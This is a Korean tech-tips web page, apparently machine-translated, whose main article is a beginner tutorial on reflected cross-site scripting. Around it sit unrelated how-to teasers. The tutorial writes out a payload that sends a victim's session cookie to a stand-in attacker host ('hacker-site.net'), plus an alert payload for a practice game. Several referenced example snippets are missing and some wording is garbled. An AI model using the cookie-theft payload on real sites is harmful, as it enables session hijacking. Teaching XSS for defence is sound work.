Chromebook을 별도의 화면이나 TV에 연결하는 방법
Chrome OS는 사용자가 Chromebook을 별도의 화면이나 TV에 연결할 수 있는 다양한 방법을 지원합니다.
Web7: XSS 공격 – 1부: 반사된 XSS
교차 사이트 스크립팅이란 무엇입니까?
XSS( 교차 사이트 스크립팅 )는 공격의 대부로 알려진 오늘날 가장 널리 사용되는 공격 기술 중 하나이며 수년 동안 애플리케이션 웹에 대한 가장 위험한 공격 기술로 선정되었습니다.
HTML의 Cascading Style Sheet 개념과 혼동을 피하기 위해 줄여서 CSS라고 부르지 마십시오.
XSS
기술은
더 잘 이해하기 위해 다음 예를 고려해 보겠습니다. name 변수에 Ping 값을 전달한다고 가정하고 URL을 통해 전달한 값을 인쇄할 수 있는 웹 애플리케이션:
지금까지는 모든 것이 괜찮습니다. HTML 소스 코드를 검토해 보겠습니다.
쉽게 볼 수 있는 것은 우리가 입력한 이름 값이 소스 코드에 삽입되었다는 점입니다. 따라서 가져온 항목을 삽입할 수도 있습니다. 입력한 값이 위와 같은 일반 문자열이 아니지만 다음과 같이 잠재적으로 위험한 코드 조각인 경우 문제는 심각해집니다.
위의 값으로 다시 시도하세요.
이 예에서 우리는 두 가지 결론을 내릴 수 있습니다. 첫째, name 변수는 어떤 입력값이라도 받아서 처리를 위해 서버로 전송할 수 있습니다. 둘째, 서버는 이 입력 값을 브라우저에 반환하기 전에 이를 제어하지 않았습니다. 그러면 소스 코드에 자바스크립트 코드가 삽입됩니다.
XSS는 일반적으로 Reflected, Stored 및 DOM 기반의 3가지 주요 유형으로 나뉩니다. 이 기사에서는 주로 Reflected XSS 기술을 언급할 것입니다.
XSS 기술의 최대 75%는 Reflected XSS를 기반으로 합니다. 이러한 유형의 악용 시나리오에서는 해커가 피해자에게 악성 코드(일반적으로 자바스크립트)가 포함된 URL을 보내야 하기 때문에 반영이라고 합니다. 피해자는 이 URL만 요청하면 해커는 원하는 결과(여기에 표시된 반사성)가 포함된 응답을 즉시 받게 됩니다. 또한 1차 XSS라고도 합니다.
실제 채굴 시나리오
Reflected XSS 오류를 악용하는 방법은 여러 가지가 있으며, 가장 잘 알려진 방법 중 하나는 사용자 세션을 장악하여 데이터에 액세스하고 웹 사이트에 대한 권리를 얻는 것입니다.
자세한 내용은 다음 단계에서 설명됩니다.
1. 사용자는 웹에 로그인하고 세션이 할당되었다고 가정합니다.
Set-Cookie: sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d42. 해커는 어떤 식으로든 사용자에게 다음 URL을 보냅니다.
http://example.com/name=var+i=new+Image;+i.src=”http://hacker-site.net/”%2bdocument.cookie;example.com이 피해자가 방문하는 웹사이트이고, hacker-site.net이 해커가 만든 사이트라고 가정해 보겠습니다.
3. 피해자는 위의 URL에 접속합니다.
4. 서버는 요청에 포함된 데이터(해커의 자바스크립트 조각)와 함께 피해자에게 응답합니다.
5. 피해자 브라우저는 응답을 수신하고 자바스크립트를 실행합니다.
6. 해커가 실제로 작성한 자바스크립트는 다음과 같습니다.
var i=new Image; i.src=”http://hacker-site.net/”+document.cookie;위 명령줄은 기본적으로 사용자 쿠키 매개변수를 사용하여 해커 사이트에 요청을 보냅니다.
GET /sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4 HTTP/1.1Host: hacker-site.net7. 해커는 귀하의 사이트에서 위의 요청 내용을 포착하고 사용자의 세션을 장악할 것으로 간주합니다. 이 시점에서 해커는 피해자를 사칭하여 피해자가 갖고 있는 웹사이트에 대한 모든 권리를 행사할 수 있다.
관행
Google은 여기에서 XSS 오류 활용을 연습할 수 있는 페이지를 만들었습니다: https://xss-game.appspot.com
이러한 챌린지의 목표는 스크립트를 삽입하여 팝업을 표시해야 한다는 것입니다. 첫 번째 과제는 반영된 기술을 설명하는 것입니다. 공격 코드는 매우 간단합니다.
https://xss-game.appspot.com/level1/frame?query=alert('pwned')행운을 빌어요!
ITop Data Recovery를 사용하여 컴퓨터 데이터를 복원하는 방법
iTop Data Recovery는 Windows 컴퓨터에서 삭제된 데이터를 복구하는 데 도움이 되는 소프트웨어입니다. 이 가이드에서는 iTop Data Recovery 사용 방법에 대해 자세히 설명합니다.
Cleaner One Pro로 Mac, Windows PC 속도를 높이는 방법
느린 PC와 Mac의 속도를 높이고 유지 관리하는 방법과 Cleaner One Pro와 같은 유용한 도구를 알아보세요.
MSIX란 무엇인가요? Windows의 새로운 파일 형식에 대해 알아보기
MSIX는 LOB 애플리케이션부터 Microsoft Store, Store for Business 또는 기타 방법을 통해 배포되는 애플리케이션까지 지원하는 크로스 플랫폼 설치 관리자입니다.
키보드 없이 Windows 컴퓨터 화면에 로그인하는 방법
컴퓨터 키보드가 작동을 멈춘 경우, 마우스나 터치 스크린을 사용하여 Windows에 로그인하는 방법을 알아보세요.
AMD Ryzen Master로 RAM을 쉽게 오버클럭하는 방법
다행히 AMD Ryzen 프로세서를 실행하는 Windows 컴퓨터 사용자는 Ryzen Master를 사용하여 BIOS를 건드리지 않고도 RAM을 쉽게 오버클럭할 수 있습니다.
MS Edge를 실행하고 명령줄에서 URL을 여는 방법
Microsoft Edge 브라우저는 명령 프롬프트와 같은 명령줄 도구에서 열 수 있도록 지원합니다. 명령줄에서 Edge 브라우저를 실행하는 방법과 URL을 여는 명령을 알아보세요.
컴퓨터에서 가상 드라이브를 생성하는 최고의 소프트웨어
이것은 컴퓨터에 가상 드라이브를 생성하는 많은 소프트웨어 중 5개입니다. 가상 드라이브 생성 소프트웨어를 통해 효율적으로 파일을 관리해 보세요.
이제 Windows Store에서 Surface 노트북 하드웨어 테스트 도구를 사용할 수 있습니다.
Microsoft의 공식 Surface 하드웨어 테스트 도구인 Surface Diagnostic Toolkit을 Windows Store에서 다운로드하여 배터리 문제 해결 등의 필수 정보를 찾으세요.
USB에 숨겨진 파일과 폴더를 표시하는 방법
바이러스가 USB 드라이브를 공격하면 USB 드라이브의 모든 데이터를 "먹거나" 숨길 수 있습니다. USB 드라이브의 숨겨진 파일과 폴더를 표시하는 방법은 LuckyTemplates의 아래 기사를 참조하세요.